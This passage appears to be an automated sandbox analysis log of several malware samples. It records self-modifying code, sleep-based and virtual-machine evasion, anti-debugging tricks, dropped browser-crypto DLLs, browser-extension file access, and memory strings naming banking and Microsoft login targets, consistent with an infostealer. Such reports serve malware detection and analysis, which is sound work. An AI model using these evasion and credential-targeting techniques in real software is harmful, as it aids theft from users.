Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: A596F1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 428A80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5D989D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5EF478 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 667F3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Special instruction interceptor: First address: FA815A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Special instruction interceptor: First address: FD0AFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 29DC42 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 29DD58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 29DC4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 437F43 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 4D9D3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5FFDC42 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5FFDD58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5FFDC4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 6197F43 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Memory allocated: 4D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Memory allocated: 4B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_04D90328 rdtsc 14_2_04D90328
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 592
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\file.exe TID: 432 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4308 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6668 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5524 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 3176 Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\file.exe TID: 3176 Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6004 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1440 Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7124 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7308 Thread sleep count: 281 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7308 Thread sleep time: -8430000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep time: -132066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100 Thread sleep time: -136068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7536 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8116 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8116 Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep count: 592 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep time: -1184592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7308 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7312 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7372 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 189 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 176 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 176 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 126 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 78 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 118 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 1632 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 8020 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7676 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 892 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7668 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 5780 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7784 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7656 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7412 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 5908 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe TID: 4332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Last function: Thread delayed
Source: C:\Users\user\Documents\JKECGDBFCB.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C4EC930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: skotes.exe, skotes.exe, 00000010.00000002.2657266202.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3321935060.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, 2533b4b8c7.exe, 00000012.00000002.3320129822.00000000009AE000.00000040.00000001.01000000.0000000F.sdmp, feb3d39b6a.exe, 00000013.00000002.3345447491.0000000005EBB000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3346402660.000000000617A000.00000040.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3320178921.00000000005B8000.00000040.00000001.01000000.00000010.sdmp, 815f2a8fe8.exe, 00000014.00000002.3070485860.0000000000F8D000.00000040.00000001.01000000.00000011.sdmp, feb3d39b6a.exe, 00000016.00000002.3319917877.00000000005B8000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000835000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPP
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: firefox.exe, 00000023.00000002.3238991466.00000132AC460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:6x.
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3171403856.00000000056B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: feb3d39b6a.exe, 00000016.00000002.3342025248.0000000005679000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3233382909.000000000567D000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3241071191.000000000567D000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3286619408.0000000005679000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3310416758.0000000005679000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3287512405.000000000567A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ym32rGu9qOBxJlidaNEL07G91Wp5WWQ9jOEqemUc%2FYHvy1e2BwWKsxzDC2g6y70OQ500grZ7Maxdm11AEfEXNaTaNyKtaX9jPGkxN5QKCDD5VwG%2BaloOPYpikudO7JJW3LkiA9U%3D"}],"group":"cf-nel","max_age":604800}
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2604363979.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3331222029.0000000001628000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3331222029.0000000001658000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000001008000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000002.3342180435.00000000056A0000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 815f2a8fe8.exe, 00000014.00000002.3062536575.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000003.3137310167.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: feb3d39b6a.exe, 00000016.00000003.3234413753.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3233162517.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ym32rGu9qOBxJlidaNEL07G91Wp5WWQ9jOEqemUc%2FYHvy1e2BwWKsxzDC2g6y70OQ500grZ7Maxdm11AEfEXNaTaNyKtaX9jPGkxN5QKCDD5VwG%2BaloOPYpikudO7JJW3LkiA9U%3D"}],"group":"cf-nel","max_age":604800}
Source: 0d957dbf73.exe, 00000015.00000003.3169954332.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000003.3179111562.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000003.3160561525.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000002.3186445759.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0d957dbf73.exe, 00000015.00000003.3046557532.0000000000B02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2604363979.0000000000F44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWxL
Source: feb3d39b6a.exe, 00000016.00000003.3171403856.00000000056B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.2604363979.0000000000F72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2594058159.00000000005BD000.00000040.00000001.01000000.00000003.sdmp, JKECGDBFCB.exe, 0000000E.00000002.2625269911.0000000000709000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000F.00000002.2650483415.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000010.00000002.2657266202.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3321935060.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, 2533b4b8c7.exe, 00000012.00000002.3320129822.00000000009AE000.00000040.00000001.01000000.0000000F.sdmp, feb3d39b6a.exe, 00000013.00000002.3345447491.0000000005EBB000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3346402660.000000000617A000.00000040.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3320178921.00000000005B8000.00000040.00000001.01000000.00000010.sdmp, 815f2a8fe8.exe, 00000014.00000002.3070485860.0000000000F8D000.00000040.00000001.01000000.00000011.sdmp, feb3d39b6a.exe, 00000016.00000002.3319917877.00000000005B8000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: feb3d39b6a.exe, 00000016.00000003.3234413753.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3233162517.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: server-timingcfL4;desc="?proto=TCP&rtt=1576&min_rtt=1568&rtt_var=605&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21474&delivery_rate=1784841&cwnd=195&unsent_bytes=0&cid=7873240d477e5de5&ts=791&x=0"alt-svch3=":443"; ma=86400CF-RAY8ef997bf7e8542f5-EWRNEL{"success_fraction":0,"report_to":"cf-nel","max_age":604800}Report-To{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ym32rGu9qOBxJlidaNEL07G91Wp5WWQ9jOEqemUc%2FYHvy1e2BwWKsxzDC2g6y70OQ500grZ7Maxdm11AEfEXNaTaNyKtaX9jPGkxN5QKCDD5VwG%2BaloOPYpikudO7JJW3LkiA9U%3D"}],"group":"cf-nel","max_age":604800}CF-Cache-StatusDYNAMICPersistent-AuthWWW-AuthenticateVaryPHPSESSID=sbsmhq95q5dl2bledkjvs703c0; expires=Fri, 04-Apr-2025 19:38:36 GMT; Max-Age=9999999; path=/Set-CookiecloudflareServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedThu, 19 Nov 1981 08:52:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 10 Dec 2024 01:51:57 GMTDateProxy-ConnectioncloseConnectionno-store, no-cache, must-revalidateCache-Control
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\JKECGDBFCB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_04D904A2 Start: 04D9051D End: 04D90490 14_2_04D904A2
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: procmon_window_class
